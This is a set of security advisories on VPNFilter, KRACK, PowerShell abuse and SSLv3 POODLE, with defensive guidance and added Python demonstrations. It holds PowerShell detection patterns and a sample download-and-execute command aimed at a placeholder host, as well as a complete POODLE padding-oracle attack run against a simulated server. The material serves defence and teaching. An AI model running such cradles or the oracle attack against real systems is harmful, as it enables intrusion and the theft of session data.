Security Advisory (S18-01) – Protect your routers from VPNFilter malware attack

Published on: 11 September 2018
Updated on: 5 October 2018


VPNFilter is malware designed to infect small office and home office (SOHO) network equipment, including routers and network-attached storage (NAS) devices. Once installed it lets attackers run man-in-the-middle attacks on traffic passing through the infected router, harvest credentials, and take supervisory control of the device. In May 2018, security researchers warned that VPNFilter might have infected over 500,000 devices in 54 countries since 2016.

All users of SOHO network equipment are advised to reboot their routers and NAS devices to temporarily disrupt the malware and to apply the latest firmware update. It is always good practice to change the router’s default password and to disable remote management for stronger security.

Affected devices

The SOHO routers and NAS devices known to be targeted by VPNFilter are:

SOHO Routers

ASUS: RT-AC66U, RT-N10, RT-N10E, RT-N10U, RT-N56U, and RT-N66U
D-Link: DES-1210-08P, DIR-300, DIR-300A, DSR-250N, DSR-500N, DSR-1000, and DSR-1000N
Huawei: HG8245
Linksys: E1200, E2500, E3000, E3200, E4200, RV082, and WRVS4400N
MikroTik: CCR1009, CCR1016, CCR1036, CCR1072, CRS109, CRS112, CRS125, RB411, RB450, RB750, RB911, RB921, RB941, RB951, RB952, RB960, RB962, RB1100, RB1200, RB2011, RB3011, RB Groove, RB Omnitik, and STX5
NETGEAR: DG834, DGN1000, DGN2200, DGN3500, FVS318N, MBRN3000, R6400, R7000, R8000, WNR1000, WNR2000, WNR2200, WNR4000, WNDR3700, WNDR4000, WNDR4300, WNDR4300-TN, and UTM50
TP-Link: R600VPN, TL-WR741ND, and TL-WR841N
Ubiquiti: NSM2 and PBE M5

Network-attached storage

QNAP: TS251, TS439 Pro, and other QNAP NAS devices running QTS software



In a small or home office environment, the affected devices are often exposed directly to the Internet without network perimeter defences such as firewalls, intrusion prevention systems, application proxies or virtual private network servers. The devices themselves usually have little or no built-in anti-malware support, and novice users may not patch publicly known vulnerabilities in a timely manner. These weaknesses add up to make the devices vulnerable to VPNFilter.

Multi-stage attack

The initial attack vector is uncertain. The devices could, however, be attacked remotely through publicly known vulnerabilities, and default or weak passwords may allow attackers to brute-force their way in. Once VPNFilter is installed on a device, it operates in three stages, downloading further malicious modules at each stage to perform different functions.

Stage 1 builds the foothold on the device and contacts the deployment servers for the subsequent stages. A persistent loader is installed and added to the job scheduler (crontab) by modifying the device’s non-volatile memory (NVRAM), so the malware loaded at this stage cannot be cleared by rebooting the device.

Stage 2 provides functions to collect intelligence, execute commands, exfiltrate data, manage the device, and even overwrite the firmware to make the device unusable. Unlike stage 1, this stage does not persist: it is removed when the device is power cycled.

Stage 3 offers plug-in modules for the stage 2 malware providing a variety of sophisticated functions, including packet sniffing, Tor network access, redirecting and inspecting web browsing traffic, forwarding network traffic to attacker-specified infrastructure, blocking network access to specific IP addresses, scanning and mapping local networks for lateral movement, remote command execution, and establishing encrypted tunnels to evade detection during remote operation and data exfiltration. Rebooting the device also removes the stage 3 plug-ins.

Resilient malware control

VPNFilter downloads a photo from the image sharing host “photobucket[.]com” and derives the command and control (C2) server address from the GPS latitude and longitude values stored in the photo’s EXIF metadata. It reserves another domain, “toknowall[.]com”, as a backup site for downloading the same photo. If it fails to get the C2 server address from both domains, it opens a listener and waits for a specific trigger packet from the threat actor. On receiving a packet meeting predefined criteria, VPNFilter extracts the C2 server address from that packet. This layered design means that taking down a single domain does not cut the malware off from its operators.


Confidentiality is compromised because all of the users’ network traffic passes through the infected device. VPNFilter could monitor communications, intercept traffic, and exfiltrate user information. Even when a user requests an HTTPS website, the malware could act as a man-in-the-middle and downgrade (strip) the request to unencrypted HTTP, so that the traffic can be read and modified.

Permanent destruction is enabled by VPNFilter’s stage 2 malware, which could execute commands to destroy the device firmware and render the device inoperable. Most non-technical consumers would not be able to recover such a device. Worse, because so many network perimeter devices could be infected at once, a coordinated destructive command could cut off Internet access for a very large number of users at the same time.

Endpoint infection is facilitated since VPNFilter could inject exploit code or malicious content into traffic through the infected network device to reach the user’s endpoint device.

Further attacks could be launched from devices infected with VPNFilter against other systems over the Internet. As their infected devices become launch pads for further attacks, their owners would be subject to blacklisting, blocking and counter-measures from other victims, while the original source of the attack stays hidden behind the infected devices.


Owners of affected devices are advised to:

  1. Reboot your device as a precaution to temporarily disrupt possible malware operations.
  2. Upgrade your device to the latest available firmware version to ensure that it is fully patched against known vulnerabilities.
  3. Change the default credentials and set a strong password for logging in to your device.
  4. Disable Internet access of the admin interface of your device.
  5. Deploy additional security protections such as firewalls and anti-malware solutions between your network device and endpoint devices.

If your device is infected:

  1. Disconnect your device from the Internet.
  2. Reset your device to factory defaults, which also removes the persistent stage 1 component that survives a plain reboot, and restore your configuration from a clean backup.
  3. Change to a new administrator password.
  4. Apply the latest patches and updates for your device after reconnecting it to the Internet.

Further Reading

US-CERT Alert(TA18-145A)

New VPNFilter malware targets at least 500K networking devices worldwide

VPNFilter Update - VPNFilter exploits endpoints, targets new devices

VPNFilter III: More Tools for the Swiss Army Knife of Malware

Security Advisory (S17-01) – Secure Your Wi-Fi networks against WPA/WPA2 Vulnerabilities

Published on: 24 October 2017
Updated on: 22 November 2017


The Wi-Fi Protected Access (WPA and WPA2) security protocols, developed by the Wi-Fi Alliance to enhance the security of Wi-Fi networks, have multiple vulnerabilities that let threat actors eavesdrop on your network traffic, decrypt traffic, hijack connections, and perform man-in-the-middle (MitM) attacks. All network devices that use WPA or WPA2 without the relevant patches are vulnerable.

Security researchers disclosed the findings in October 2017 and named the vulnerabilities KRACK (Key Reinstallation AttaCKs). They exploit weaknesses in the standards-based WPA and WPA2 protocols to compromise the confidentiality and integrity of Wi-Fi communications. In total, ten vulnerabilities were identified. Nine of them require client-side operating system updates to patch devices such as notebooks, mobile phones and tablets. The tenth requires a firmware fix to the fast roaming feature of Wi-Fi access points (APs).

Users are strongly advised to deploy a second layer of protection, such as a virtual private network (VPN), Transport Layer Security (TLS) or Secure Shell (SSH), to encrypt data over a Wi-Fi connection whenever there is any doubt about the security of the access point, in particular when using public Wi-Fi services.

Vulnerabilities and Impacts

WPA and WPA2 are widely deployed in Wi-Fi clients and APs. The weaknesses are in the protocol itself and therefore all compliant implementations of WPA/WPA2 are vulnerable. A successful attack may lead to information leakage, forgery, obstruction of communication or other damages.

The involved vulnerabilities are summarised as follows:

4-Way handshake (clients authenticate to the network)
  Relevant vulnerability: CVE-2017-13077
  Systems affected: Wi-Fi clients using OS X, macOS, Android, OpenBSD, MediaTek, wpa_supplicant

Group Key handshake (the client renegotiates the keys used for broadcast and multicast frames)
  Systems affected: Wi-Fi clients using OS X, macOS, iOS, Android, OpenBSD, Windows, MediaTek, wpa_supplicant

Fast BSS Transition handshake (speeds up roaming of clients between APs)
  Relevant vulnerability: CVE-2017-13082
  Systems affected: Wi-Fi routers, Wi-Fi APs

PeerKey handshake (two clients connect to each other directly)
  Systems affected: Wi-Fi clients using wpa_supplicant

US-CERT has published a list of vendors who have disclosed if they are affected and their solutions.


For owners/ users of Wi-Fi clients including notebooks, mobile phones, and Internet connected devices:

  1. Upgrade the affected operating systems for mobile devices to their latest releases.
  2. Use HTTPS (TLS) or a VPN on top of WPA/WPA2 when handling personal, confidential or sensitive information.
  3. Turn off Wi-Fi function when not in use.

For owners / administrators of Wi-Fi network devices, like APs and routers:

  1. Upgrade the firmware of APs and routers as soon as the vendor releases an update that fixes the FT vulnerability (CVE-2017-13082).
  2. Until that firmware upgrade has been applied, disable the 802.11r fast roaming feature on the Wi-Fi network devices.

For service providers of public Wi-Fi and hotspots:

  1. Upgrade the firmware of APs and routers as soon as the vendor releases an update that fixes the FT vulnerability (CVE-2017-13082).
  2. Until that firmware upgrade has been applied, disable the 802.11r fast roaming feature on the Wi-Fi network devices.
  3. Inform your mobile clients to upgrade or patch their mobile computers or devices.
  4. Enforce layer-2 isolation which blocks direct client-to-client communication and thereby avoids the attack on PeerKey handshake.
  5. Deploy wireless intrusion protection systems to detect wireless attacks and provide real-time alerts with a view to preventing users from mis-associating with rogue APs, which enable MitM attacks.

What is KRACK?

According to the security researchers who discovered the weaknesses, KRACK targets four types of cryptographic Wi-Fi handshakes: the 4-Way handshake, the Group Key handshake, the 802.11r Fast BSS Transition (FT) handshake and the PeerKey handshake. An attacker within Wi-Fi range of the targeted AP and client devices can exploit the vulnerabilities by cloning the legitimate network on a different channel and forcing the client devices to connect through the clone, which puts the attacker in a man-in-the-middle position between client and AP.

The 4-Way handshake is used to negotiate a fresh session key for protected Wi-Fi networks. A man-in-the-middle (MitM) attacker intercepts and manipulates the handshake frames between the client and the AP, for example by withholding the final acknowledgement so that the AP retransmits message 3, which causes the client to reinstall a key that is already in use. The key reinstallation resets the packet number (the nonce, a value that must be used only once with a given key) and the receive replay counter to their initial values. The same nonce is then reused to encrypt subsequent data frames, which allows the attacker to replay, decrypt or forge frames. Windows and Apple iOS do not accept retransmissions of message 3 (a deviation from the 802.11 standard), so those operating systems are not vulnerable to the attack on the 4-Way handshake. Android 6.0 and later, on the other hand, go one step further: owing to a bug in the underlying wpa_supplicant code, the client installs a predictable all-zero encryption key when the retransmitted message is received, so the attacker can decrypt its traffic without any further work.

The Group Key handshake is used to distribute the group key with which the AP encrypts broadcast and multicast frames sent to all or several clients. A MitM attack on the Group Key handshake causes the client to reinstall the group key. As a result, the group key replay counter is reset, enabling the attacker to replay broadcast and multicast frames captured earlier. All Wi-Fi clients, including Windows, Apple iOS, Android, Linux and others, are vulnerable to the attack on the Group Key handshake.

802.11r or Fast Basic Service Set Transition (FT) handshake is to reduce the roaming time when a client moves from one AP to another of the same network. The attack against the FT handshake does not require a MitM position. Being able to eavesdrop and inject frames is sufficient. The attacker replays the handshake frame to trigger key reinstallation at the AP, thereby reinitializing the associated nonce and replay counter and facilitating the replay of data frames sent by the client to the AP.

The PeerKey handshake is used when two clients communicate with each other directly without going through an AP. Since part of the handshake is based on the 4-way handshake, it can be attacked in exactly the same manner as the 4-Way handshake.
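The key reinstallation behaviour described above, reduced to the two effects that matter (nonce reuse and a reset replay counter), as an added example in Python. This is not code from the advisory or from the KRACK researchers: HMAC-SHA256 in counter mode stands in for AES-CCMP, the PTK, the known request and the cookie are constructed values, and the `patched` flag models the fix that was applied in client implementations (an already-installed key is not installed again).

```python
"""Key reinstallation in a counter-mode cipher: what a retransmitted message 3 does
to the nonce and replay counter of a vulnerable client, and why the fix works.
Added example; HMAC-SHA256 in counter mode stands in for AES-CCMP."""
import hashlib
import hmac

KEY_LEN = 16


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def keystream(key, nonce, length):
    """Keystream block i = PRF(key, nonce || i). Reusing (key, nonce) reuses the keystream."""
    out, i = b"", 0
    while len(out) < length:
        out += hmac.new(key, nonce.to_bytes(6, "big") + i.to_bytes(2, "big"), hashlib.sha256).digest()
        i += 1
    return out[:length]


class Supplicant:
    """Client side of the 4-Way handshake, reduced to what matters for KRACK:
    what happens when message 3 (which triggers PTK installation) arrives twice."""

    def __init__(self, patched):
        self.patched = patched
        self.ptk = None
        self.tx_nonce = 0      # packet number used for outgoing frames
        self.rx_replay = -1    # highest packet number accepted from the AP

    def on_message3(self, ptk):
        # A retransmitted message 3 carries the same PTK. The fix is to notice that
        # this key is already installed and to leave the counters alone.
        if self.patched and ptk == self.ptk:
            return
        self.ptk = ptk
        self.tx_nonce = 0      # vulnerable behaviour: installing the key resets the nonce...
        self.rx_replay = -1    # ...and the replay counter

    def protect(self, frame):
        nonce, self.tx_nonce = self.tx_nonce, self.tx_nonce + 1
        return nonce, xor(frame, keystream(self.ptk, nonce, len(frame)))

    def unprotect(self, nonce, ct):
        if nonce <= self.rx_replay:
            return None        # replay: this packet number was already accepted
        self.rx_replay = nonce
        return xor(ct, keystream(self.ptk, nonce, len(ct)))


# Constructed values; a real PTK is derived from the PMK, ANonce and SNonce.
PTK = hashlib.sha256(b"constructed PMK|ANonce|SNonce").digest()[:KEY_LEN]
KNOWN = b"GET /index.html HTTP/1.1\r\n"     # plaintext the attacker can predict
SECRET = b"Cookie: session=abc123\r\n"       # plaintext the attacker wants


def decrypt_via_nonce_reuse(patched):
    """Attacker replays message 3 between two client frames, then XORs the ciphertexts."""
    sta = Supplicant(patched)
    sta.on_message3(PTK)                     # genuine message 3
    n1, c1 = sta.protect(KNOWN)
    sta.on_message3(PTK)                     # attacker's replayed message 3
    n2, c2 = sta.protect(SECRET)
    n = min(len(c1), len(c2))
    recovered = xor(xor(c1[:n], c2[:n]), KNOWN[:n])   # equals SECRET[:n] iff the keystream was reused
    return n1 == n2, recovered


def replay_after_reinstall(patched):
    """A frame recorded earlier is accepted again once the replay counter has been reset."""
    sta = Supplicant(patched)
    sta.on_message3(PTK)
    ct = xor(b"data", keystream(PTK, 7, 4))  # AP -> client frame with packet number 7, recorded by the attacker
    first = sta.unprotect(7, ct)             # accepted
    replay_before = sta.unprotect(7, ct)     # dropped: counter already at 7
    sta.on_message3(PTK)                     # key reinstallation
    replay_after = sta.unprotect(7, ct)      # vulnerable client accepts it again
    return first, replay_before, replay_after


if __name__ == "__main__":
    print("vulnerable:", decrypt_via_nonce_reuse(patched=False))
    print("patched:   ", decrypt_via_nonce_reuse(patched=True))
```

With `patched=False` both frames are encrypted under packet number 0, so XORing the two ciphertexts cancels the keystream and the known request reveals the cookie; with `patched=True` the second frame uses packet number 1 and the XOR yields nothing useful. The replay function shows the second effect on the receive side.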

Further Reading

CERT/CC Vulnerability Note VU#228519

Key Reinstallation Attacks - Breaking WPA2 by forcing nonce reuse

Wi-Fi Alliance security update October 2017

Guidelines on the Security Aspects for the Design, Implementation, Management and Operation of Public Wi-Fi Service, Office of the Communications Authority

Security Advisory (S16-01) – Securing Microsoft Windows PowerShell

Published on: 28 December 2016

Issue Description

Researchers and security vendors have warned that threats abusing Microsoft Windows PowerShell are on the rise, and recommend upgrading PowerShell and hardening Windows without delay to guard against such abuse.


PowerShell is a powerful command-line shell and task-based scripting language built into all supported versions of Microsoft Windows. It is designed for system administrators and power-users to automate the administration of the operating systems and the processes related to the applications, such as Microsoft Office and web browsers, that run on those operating systems.

Once attackers have access to PowerShell, they can take control of computers without writing any malware to disk. PowerShell can execute commands directly in memory and keep its instructions in the registry, so no malicious file is saved on disk and little trace is left for monitoring, detection and analysis. Its remote access capability (PowerShell remoting over WinRM) encrypts sessions by default, which makes the traffic harder for network-based intrusion detection systems to inspect. Without enhanced logging, malicious PowerShell activity blends into legitimate PowerShell operations and is hardly visible in the event logs.

Attackers are increasingly using this kind of file-less attack to stay undetected and persistent on victims’ computers and networks. This is not due to any vulnerability in PowerShell itself; rather, it shows how important it is to configure this powerful administration tool properly and to keep systems patched.


Suggested Actions:

  1. Upgrade to PowerShell 5 (Windows Management Framework 5). It has more effective defences than previous versions, such as strengthened logging (script block and module logging) and integration with the Antimalware Scan Interface (AMSI), which lets anti-malware products inspect script content at run time, including scripts that never touch disk.
  2. Enforce a script execution policy with Group Policy and code-signing certificates. With the AllSigned policy, every script run on user computers must be signed by a trusted publisher. Note that the execution policy is a safety net against running scripts by accident, not a security boundary: anyone with interactive access can bypass it (for example with -ExecutionPolicy Bypass), so it must be combined with the whitelisting and logging measures below.
  3. Whitelist scripts and restrict access to PowerShell hosts. Use application whitelisting (for example AppLocker script rules) so that only approved scripts run, and restrict both the default and any custom PowerShell hosts to the administrators or users who need them.
  4. Enable PowerShell event logging. PowerShell 5 provides script block logging (event ID 4104 in the Microsoft-Windows-PowerShell/Operational log), module logging and transcription, which record the de-obfuscated content of executed code and make suspicious activity visible even when it runs only in memory.
  5. Lock down the PowerShell language mode. Constrained Language Mode restricts the .NET and COM functionality available to interactive input and user-authored scripts, which limits the attack surface for malicious PowerShell; it is enforced automatically on systems where an AppLocker or Device Guard policy is in effect. Remoting endpoints that need no interactive scripting at all, such as Just Enough Administration endpoints, can be set to NoLanguage mode.
  6. Harden PowerShell remoting. Configure the WinRM client and service via Group Policy: allow only the authentication protocols that are needed, disable stored credentials, and disable the legacy WinRM 1.1 listeners on ports 80 and 443 (WinRM 2.0 and later listen on 5985 for HTTP and 5986 for HTTPS).
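The logging in step 4 is only useful if someone looks at what it produces. The following is an added example in Python, not code from the advisory or from the ACSC guidance, of the triage a detection engineer would run over PowerShell telemetry: it flags download cradles, Invoke-Expression, hidden windows, execution-policy bypasses and reflective loading, and it decodes -EncodedCommand arguments (Base64 over UTF-16LE) so that rules can fire on what the encoding hides. The event records are constructed to resemble script block logging (event 4104) and process creation auditing (event 4688); they are not real captures, and the rule set is a starting point, not a complete one.

```python
"""Triage of PowerShell script block / process creation events for the abuse
patterns described above. Added example; the sample events are constructed."""
import base64
import binascii
import re

RULES = {
    "download-cradle": re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|BitsTransfer", re.I),
    "invoke-expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "execution-policy-bypass": re.compile(r"-ex\w*\s+bypass", re.I),
    "inline-base64": re.compile(r"FromBase64String", re.I),
    "reflective-load": re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load", re.I),
}
# powershell.exe accepts any unambiguous prefix of -EncodedCommand; these are the common spellings.
ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(token):
    """-EncodedCommand takes Base64 over UTF-16LE. Returns the script, or None if it is not one."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def classify(text, depth=0):
    """Return (set of rule names that fired, decoded -EncodedCommand payload or None).
    A decoded payload is scanned again so that rules can fire on what was hidden."""
    hits = {name for name, rx in RULES.items() if rx.search(text)}
    decoded = None
    match = ENCODED.search(text)
    if match and depth < 3:                     # depth limit: payloads may nest encodings
        decoded = decode_encoded_command(match.group(1))
        if decoded is not None:
            hits.add("encoded-command")
            hits |= classify(decoded, depth + 1)[0]
    return hits, decoded


def scan_events(events):
    """events: iterable of {"id": <event id>, "text": <script block or command line>}."""
    findings = []
    for event in events:
        hits, decoded = classify(event["text"])
        if hits:
            findings.append({"id": event["id"], "rules": sorted(hits), "decoded": decoded})
    return findings


def encode_command(script):
    """Build the argument an attacker would pass to -EncodedCommand (used to construct a sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLE_EVENTS = [   # constructed records, not real logs
    {"id": 4104, "text": "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB"},
    {"id": 4104, "text": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"},
    {"id": 4688, "text": "powershell.exe -NoP -W Hidden -Exec Bypass -enc " + encode_command(
        "$c=[Convert]::FromBase64String('QUJD');IEX([Text.Encoding]::Unicode.GetString($c))")},
    {"id": 4104, "text": "Set-ExecutionPolicy RemoteSigned -Scope CurrentUser"},
]

if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(finding)
```

The benign directory listing and the policy change produce no findings; the download cradle and the encoded command line do, and for the latter the decoded payload is reported so that the analyst sees the Invoke-Expression and FromBase64String calls that the command line itself does not show.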

Other Information

Despite its file-less execution capabilities, PowerShell can only be run if the attacker gains access to a system. It requires common initial attack vectors, such as phishing emails and drive-by downloads, to step into the target systems. In addition to securing the PowerShell configuration, the front line of defense should be practicing good cyber hygiene actions.

Additional Suggested Actions:

  1. Update operating systems, application software and device firmware with latest versions and security patches;
  2. Maintain anti-malware signatures and engines up-to-date;
  3. Disable unnecessary services on systems;
  4. Grant minimum system access rights to users, restricting them from installing and running unnecessary software applications;
  5. Advise users to immediately delete any suspicious emails and be vigilant of attachments and hyperlinks;
  6. Advise users to avoid re-enabling macros in Office documents even if prompted to;
  7. Back up data regularly and secure the offline backup;
  8. Deploy firewalls to separate networks and block malicious traffic;
  9. Enable anti-spam filters to block phishing emails;
  10. Enable Ad-blocker at web browsers;
  11. Conduct regular vulnerability scan and penetration test on systems; and
  12. Maintain situational awareness of the latest threats to formulate timely responses.


Further Reading

Microsoft Developer Network, PowerShell

Microsoft Windows Management Framework 5.0

Securing PowerShell in the Enterprise, Australian Cyber Security Centre

Security Advisory (S15-01) – Disable Secure Sockets Layer Version 3 (SSLv3)

Published on: 15 May 2015

Issue Description

The Secure Sockets Layer version 3 (SSLv3) is an obsolete and insecure protocol, and has been replaced by the Transport Layer Security (TLS) protocols.

Both SSL and TLS are cryptographic protocols designed to provide communications security over a computer network. They use X.509 certificates, and hence asymmetric cryptography, to authenticate the peer and to negotiate session keys, which then encrypt the traffic with symmetric ciphers; the best-known use is HTTPS between web browsers and web servers.


The flaw is in the design of SSLv3’s CBC-mode cipher suites: the padding added before encryption is not covered by the MAC, and the receiver checks only the padding-length byte, not the contents of the padding. The “Padding Oracle On Downgraded Legacy Encryption” (POODLE) attack first forces the web server and browser to fall back from TLS to SSLv3, then uses the server’s accept/reject behaviour as a padding oracle. An attacker on the network path who can make the browser repeat a request (for example with injected JavaScript, the same setup the earlier BEAST attack used) and modify the ciphertext in transit can recover one byte of plaintext, such as a session cookie, for roughly every 256 requests. Such man-in-the-middle attacks require an active attacker and a large number of requests, so the risk is relatively low compared with remotely exploitable flaws, but it is real for any session that an attacker can observe.

SSLv3 has been in use for over 15 years and nearly all browsers still support it. An attacker who can cause connection failures can force web servers and browsers to retry the connection with older protocols, including SSLv3; this fallback is the downgrade step of the attack. The TLS_FALLBACK_SCSV signalling value (RFC 7507) lets a server detect such a forced fallback, but only when both sides implement it; disabling SSLv3 removes the problem outright.
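The attack described above, worked through against a simulated SSLv3 record layer (MAC, then padding, then CBC encryption, with only the padding-length byte checked on receipt). This is an added example in Python and is not code from the advisory or from the POODLE researchers: a four-round HMAC-based Feistel network stands in for the real block cipher, the MAC is HMAC-SHA256 truncated to 16 bytes, and the keys, the victim’s request and the cookie are constructed values. The attacker controls the lengths of the request path and body, as injected JavaScript would, so that each cookie byte in turn lands at the end of a ciphertext block and the padding fills a whole block.

```python
"""POODLE against a simulated SSLv3 record layer. Added example; the block cipher
is a toy HMAC-based Feistel network standing in for AES or 3DES."""
import hashlib
import hmac
import random

BS = 16          # block size in bytes
MAC_LEN = 16     # HMAC-SHA256 truncated to 16 bytes (SSLv3 used MD5 or SHA-1)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key, i, half):
    # Round function of the toy cipher: keyed PRF over one 8-byte half
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]


def block_encrypt(key, block):
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, xor(l, _round(key, i, r))
    return l + r


def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = xor(r, _round(key, i, l)), l
    return l + r


def cbc_encrypt(key, iv, pt):
    out, prev = [], iv
    for i in range(0, len(pt), BS):
        prev = block_encrypt(key, xor(prev, pt[i:i + BS]))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key, iv, ct):
    out, prev = [], iv
    for i in range(0, len(ct), BS):
        out.append(xor(block_decrypt(key, ct[i:i + BS]), prev))
        prev = ct[i:i + BS]
    return b"".join(out)


def sslv3_seal(enc_key, mac_key, data, iv):
    """Sender: data || MAC(data) || padding, then CBC. Padding is 1..BS bytes; the last byte
    gives the number of filler bytes before it and the filler content is arbitrary."""
    body = data + hmac.new(mac_key, data, hashlib.sha256).digest()[:MAC_LEN]
    pad_len = BS - len(body) % BS
    return cbc_encrypt(enc_key, iv, body + bytes(pad_len - 1) + bytes([pad_len - 1]))


def sslv3_open(enc_key, mac_key, iv, ct):
    """Receiver: True if the record is accepted. Only the length byte of the padding is
    checked (the SSLv3 flaw); the MAC is then verified over what remains."""
    pt = cbc_decrypt(enc_key, iv, ct)
    pad_len = pt[-1] + 1
    if pad_len > BS or pad_len + MAC_LEN > len(pt):
        return False
    body = pt[:-pad_len]
    expected = hmac.new(mac_key, body[:-MAC_LEN], hashlib.sha256).digest()[:MAC_LEN]
    return hmac.compare_digest(body[-MAC_LEN:], expected)


def poodle_recover_byte(seal, oracle, block_index, rng, max_tries=20000):
    """Recover the last plaintext byte of ciphertext block `block_index` (block 0 is the IV).
    Per try: the victim re-encrypts the same request under a fresh IV, the attacker replaces
    the final, all-padding block with the target block and forwards the record. The server
    accepts iff the decrypted last byte equals BS-1 (about once in 256 tries), and that
    single event leaks the target byte."""
    for attempt in range(1, max_tries + 1):
        iv = bytes(rng.randrange(256) for _ in range(BS))
        ct = seal(iv)
        blocks = [iv] + [ct[i:i + BS] for i in range(0, len(ct), BS)]
        forged = b"".join(blocks[1:-1]) + blocks[block_index]
        if oracle(iv, forged):
            # D(C_i)[-1] ^ C_{n-1}[-1] == BS-1  and  P_i[-1] == D(C_i)[-1] ^ C_{i-1}[-1]
            return attempt, (BS - 1) ^ blocks[-2][-1] ^ blocks[block_index - 1][-1]
    raise RuntimeError("no accepted record; is the last block all padding?")


ENC_KEY = bytes(range(16))        # constructed keys, fixed so the run is reproducible
MAC_KEY = bytes(range(16, 32))
SECRET = b"session=s3cr3t"        # constructed cookie the attacker is after
HEAD, MID, TAIL = b"GET /", b" HTTP/1.0\r\nCookie: ", b"\r\n\r\n"


def victim_request(prefix_len, suffix_len):
    # Attacker-chosen path and body lengths around the secret cookie (the BEAST-style setup)
    return HEAD + b"A" * prefix_len + MID + SECRET + TAIL + b"B" * suffix_len


def recover_cookie(seed=1):
    rng = random.Random(seed)
    base = len(HEAD) + len(MID)
    found = bytearray()
    for j in range(len(SECRET)):
        prefix_len = (BS - 1 - base - j) % BS            # cookie byte j lands at the end of a block
        body_len = base + prefix_len + len(SECRET) + len(TAIL)
        suffix_len = (-body_len) % BS                    # data + MAC fill whole blocks: padding is a full block
        data = victim_request(prefix_len, suffix_len)
        target_block = (base + prefix_len + j) // BS + 1
        _, byte = poodle_recover_byte(
            lambda iv: sslv3_seal(ENC_KEY, MAC_KEY, data, iv),
            lambda iv, ct: sslv3_open(ENC_KEY, MAC_KEY, iv, ct),
            target_block, rng)
        found.append(byte)
    return bytes(found)


if __name__ == "__main__":
    print(recover_cookie())
```

The oracle is nothing more than whether the server accepts the record; every rejected record costs the attacker one round trip and a broken connection, which is why the attack needs the browser to reissue the request hundreds of times per byte. In TLS 1.0 and later the padding contents are checked, so the swapped block is rejected regardless of its last byte and this particular oracle disappears.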


There is no patch to fix this vulnerability and the only solution is to disable SSLv3 as an accepted secure protocol on all web servers and browsers. Please be reminded to test thoroughly before deploying changes to production environment.

What Web Server Administrators Need to Do

1. Check if the web servers are vulnerable
2. Disable SSLv3 altogether
3. Apply latest patches

Action: check if SSLv3 is enabled
Reference tool: Qualys SSL Server Test

Action: change configuration settings
Reference tool: POODLE: Turning off SSLv3 for various servers and client, SANS Internet Storm Center

What Web Browser Users Need to Do

1. Check if the web browsers are vulnerable
2. Make sure “HTTPS” is on when encryption of communications would be expected
3. Use up-to-date software

Action: check if the web browsers are vulnerable
Reference tool: SSLv3 POODLE Attack Check

Action: upgrade to the latest versions or change browser settings
Reference tool: POODLE: Turning off SSLv3 for various servers and client, SANS Internet Storm Center


Further Reading

CVE-2014-3566 SSLv3 POODLE Vulnerability